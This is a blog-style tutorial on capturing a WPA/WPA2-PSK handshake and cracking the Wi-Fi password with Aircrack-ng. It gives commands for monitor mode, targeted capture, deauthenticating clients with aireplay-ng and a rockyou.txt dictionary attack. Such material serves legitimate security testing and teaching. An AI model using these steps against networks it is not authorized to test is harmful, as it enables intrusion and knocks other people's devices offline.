In this post, a simple explanation is given how to capture the authentication handshake in Wi-Fi (PSK: Pre-Shared-Key mode)and perform dictionary attack to recover the password using Aircrack-ng
WPA/WPA2 supports PSK (Pre-Shared Key) authentication among others, and this one is the most widely used method in home and small office networks.
Capture the handshake
Make sure that your wireless card supports monitor mode, that allows you to see all the wireless traffic, including the traffic not intended for your card.
Monitor mode
Start the wireless card in monitor mode on a specific channel using airmon-ng, which allows the card to listen to every packet (and this is not limited to receive only packets addressed to you) on the channel.
airmon-ng start <interface>
airmon-ng start wlan0 When you enter the command ifconfig, you can notice that the interface name has changed from wlan0 to wlan0mon.
Display detailed information of all Wi-Fi access-points and clients in the area with airodump-ng.
airodump-ng <interface>
airodump-ng wlan0monSelect an AP from the list and start capturing with airodump-ng filtering a specific BSSID and AP’s channel to collect authentication handshake.
airodump-ng -c <channel> --bssid <BSSID> -w <filename> <interface>
airodump-ng -c 3 –-bssid 68:92:34:2B:AA:38 -w capture wlan0mon
WPA/WPA2 can obtain an authentication handshake, either actively or passively. Passively, by simply waiting for a client to authenticate with the WPA/WPA2 network. Or actively, by accelerating the process through injecting packets to deauthenticate an existing client.
De-authentication
Use aireplay-ng to de-authenticate the wireless client (in case of active approach), but this requires that there is a currently an authenticated user. This will send a message to the wireless client indicating that it is no longer associated anymore with the AP, which should trigger the client to reauthenticate with the AP.
aireplay-ng -0 1 -a <BSSID> -c <client's MAC address> wlan0monNotice that if you don’t specify an authenticated client, de-authentication is broadcasted to all clients connected to the specified AP.
Aircrack-ng
The most know tool to crack WPA/WPA2 PSK method after captured the handshake. Only brute force techniques can be used to crack WPA/WPA2 PSK, because the key is not static, and only the information obtained from the 4-way authentication handshake between client and AP is useful that can be obtained when a client connects to a network. There is no difference between cracking WPA or WPA2 networks since the authentication is almost the same. PSK key can be 8 to 63 characters long in length, and thus only be cracked by means of brute force only if it is a dictionary word in a wordlist. For simplicity, the wordlist rockyou.txt is used to demonstrate how this works.
Use aircrack-ng in wordlist mode to crack the PSK, and provide also a wordlist.
aircrack-ng -w rockyou.txt capture-01.cap
Later on, I will also write a tutorial for the usage of Hashcat for WPA cracking, which makes use of Hashcat’s feature to use GPU to increase the cracking speed.
